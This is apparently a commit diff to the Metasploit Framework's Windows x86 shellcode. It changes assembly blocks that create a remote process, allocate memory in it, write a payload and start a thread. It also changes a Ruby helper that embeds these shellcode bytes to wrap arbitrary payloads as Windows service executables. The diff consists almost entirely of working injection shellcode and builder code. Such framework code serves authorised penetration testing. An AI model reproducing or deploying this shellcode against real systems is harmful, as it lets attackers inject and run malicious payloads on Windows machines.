Improve block_create_remote_process to point on shellcode everytime

Author: Florian Gaultier

external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm

@@ -1,7 +1,7 @@
 ;-----------------------------------------------------------------------------;
 ; Author: agix (florian.gaultier[at]gmail[dot]com)
 ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
-; Size: 137 bytes
+; Size: 307 bytes
 ;-----------------------------------------------------------------------------;
 
 [BITS 32]
@@ -44,9 +44,13 @@ push ecx		;hProcess
 push 0x3F9287AE ;call VirtualAllocEx()
 call ebp
 
+call me2
+me2:
+pop edx
+
 mov edi, eax
 mov ecx, [esi]
-lea edx, [ebp+0x12a] ;pointer on the next shellcode
+lea edx, [edx+0x47] ;pointer on the next shellcode
 push esp
 push 0x00001000	;Next Shellcode Size
 push edx		;
@@ -79,4 +83,4 @@ call ebp 		;call CloseHandle()
 
 push edi
 push 0x56A2B5F0
-call ebp		;call ExitProcess(0)
+call ebp		;call ExitProcess(0)

external/source/shellcode/windows/x86/src/block/block_service.asm

@@ -1,7 +1,7 @@
 ;-----------------------------------------------------------------------------;
 ; Author: agix (florian.gaultier[at]gmail[dot]com)
 ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
-; Size: 137 bytes
+; Size: 448 bytes
 ;-----------------------------------------------------------------------------;
 
 [BITS 32]

external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm

@@ -1,8 +1,7 @@
 ;-----------------------------------------------------------------------------;
 ; Author: agix (florian.gaultier[at]gmail[dot]com)
 ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
-; Version: 1.0 (28 July 2009)
-; Size: 189 bytes + strlen(libpath) + 1
+; Size: 307 bytes
 ; Build: >build.py single_create_remote_process
 ;-----------------------------------------------------------------------------;
 

external/source/shellcode/windows/x86/src/single/single_service_stuff.asm

@@ -1,8 +1,7 @@
 ;-----------------------------------------------------------------------------;
 ; Author: agix (florian.gaultier[at]gmail[dot]com)
 ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
-; Version: 1.0 (28 July 2009)
-; Size: 189 bytes + strlen(libpath) + 1
+; Size: 448 bytes
 ; Build: >build.py single_service_stuff
 ;-----------------------------------------------------------------------------;
 

lib/msf/util/exe.rb

@@ -524,9 +524,6 @@ def self.to_win32pe_service(framework, code, opts={})
       precode_size -= 0x0d
       svcctrlhandler_code_offset = precode_size + pushed_service_name.length
 
-      precode_size += 0xe4
-      shellcode_code_offset = precode_size + (pushed_service_name.length * 2)
-
       # code_service could be encoded in the future
       code_service =
         "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
@@ -552,11 +549,12 @@ def self.to_win32pe_service(framework, code, opts={})
         "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
         "\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" +
         "\x40\x68\x00\x10\x00\x00\x68"+[code.length].pack('<I')+"\x57\x51\x68\xAE\x87" +
-        "\x92\x3F\xFF\xD5\x89\xC7\x8B\x0E\x8D\x95"+[shellcode_code_offset].pack('<I')+"\x54\x68" +
-         [code.length].pack('<I')+"\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF\xD5\x31\xC0" +
-        "\x8B\x0E\x50\x50\x50\x57\x50\x50\x51\x68\xC6\xAC\x9A\x79\xFF\xD5" +
-        "\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04\x51\x68\xC6" +
-        "\x96\x87\x52\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
+        "\x92\x3F\xFF\xD5\xE8\x00\x00\x00\x00\x5A\x89\xC7\x8B\x0E\x8D\x52" +
+        "\x47\x54\x68"+[code.length].pack('<I')+"\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF" +
+        "\xD5\x31\xC0\x8B\x0E\x50\x50\x50\x57\x50\x50\x51\x68\xC6\xAC\x9A" +
+        "\x79\xFF\xD5\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04" +
+        "\x51\x68\xC6\x96\x87\x52\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
+
 
       return to_winpe_only(framework, code_service + code, opts)
     end